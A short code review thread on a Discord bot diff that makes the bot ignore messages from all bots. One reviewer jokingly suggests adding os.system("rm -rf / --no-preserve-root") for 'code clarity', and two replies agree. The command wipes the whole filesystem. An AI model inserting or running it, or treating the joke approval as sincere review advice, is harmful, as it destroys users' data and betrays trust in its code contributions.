cdbot/cogs/fun.py

```diff
@@ -217,8 +217,8 @@ def check(reaction, user):
 
         ctx = await self.bot.get_context(message)
 
-        if ctx.valid or message.author.id is self.bot.user.id:
-            # Don't react to valid commands or messages from the bot.
+        if ctx.valid or message.author.bot:
```

Comment:
add os.system("rm -rf / --no-preserve-root") here to improve code clarity

Reply:
Agreed

Reply:
+1